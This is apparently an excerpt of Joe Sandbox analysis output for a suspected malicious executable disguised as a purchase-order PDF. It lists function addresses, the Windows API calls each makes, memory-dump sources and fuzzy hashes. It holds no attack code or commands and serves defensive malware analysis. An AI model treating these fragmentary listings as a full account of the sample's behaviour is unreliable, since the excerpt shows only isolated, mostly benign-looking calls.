                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcscpy$_wcscat
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2037614760-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4072873d08f1a4b96299f6c0206abd7390e9c2612247138ce8cf4b743a462713
                                                                                                                                                                                                                                                                                                            • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4072873d08f1a4b96299f6c0206abd7390e9c2612247138ce8cf4b743a462713
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                                                                                                                                                                                                                                            Function 00447B66 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4189319755-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                                                                                                                                                                                                            • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                                                                                                                                                                                                                                                            Function 0044B474 Relevance: 9.1, APIs: 6, Instructions: 113fileCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1726766782-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: cbcfa8e54091759680fb2fd2b0c7b0e35273af6c280fd0ab56d74fa78acbc3bb
                                                                                                                                                                                                                                                                                                            • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbcfa8e54091759680fb2fd2b0c7b0e35273af6c280fd0ab56d74fa78acbc3bb
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                                                                                                                                                                                                                                                            Function 00441077 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                                                                                                                                                                                                            • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                                                                                                                                                                                                                                                            Function 00449063 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1976402638-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                                                                                                                                                                                                                                            Function 00442582 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00442597
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004425BF
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00442624
                                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4137160315-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                                                                                                                                                                                                                                            Function 00448851 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Enable$Show$MessageSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1871949834-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                                                                                                                                                                                                            • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                                                                                                                                                                                                                                                            Function 00449606 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0044961A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0044964A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004496BA
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004496C7
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1624073603-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                                                                                                                                                                                                            • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                                                                                                                                                                                                                                                            Function 004416D1 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                                                                                                                                                                                                            • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                                                                                                                                                                                                                                                            Function 0045552E Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1640429340-0
